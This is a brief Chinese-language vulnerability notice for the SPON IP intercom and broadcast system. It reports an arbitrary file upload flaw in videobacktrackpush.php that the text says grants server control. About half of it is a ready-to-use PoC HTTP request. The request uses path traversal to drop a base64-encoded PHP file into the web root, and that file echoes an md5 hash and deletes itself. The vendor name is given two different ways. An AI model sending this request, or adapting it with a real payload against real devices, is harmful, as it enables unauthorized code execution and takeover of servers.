漏洞描述
盛邦通信的SPON IP对讲广播系统采用先进的IPAudio技术,通过局域网和广域网以数据包的形式传输音频信号。该系统实现了全数字化的传输。盛邦通信的SPONIP对讲广播系统存在一个漏洞,允许任意文件上传。攻击者可以利用这个漏洞上传任意文件,并获取服务器权限。
世邦通信SPON-IP网络对讲广播系统videobacktrackpush.php函数任意文件上传漏洞
PoC代码
POST /php/videobacktrackpush.php HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/8.54.(X11; Linux i686; fur-IT) Presto/2.9.160 Version/12.00
jsondata[caller]=1&jsondata[callee]=../../../../../../ICPAS/Wnmp/WWW&jsondata[videoname]=IEh1al.php&jsondata[videocontent]=PD9waHAgZWNobyBtZDUoMTAwODY2Nik7dW5saW5rKF9fRklMRV9fKTs/Pg%3d%3d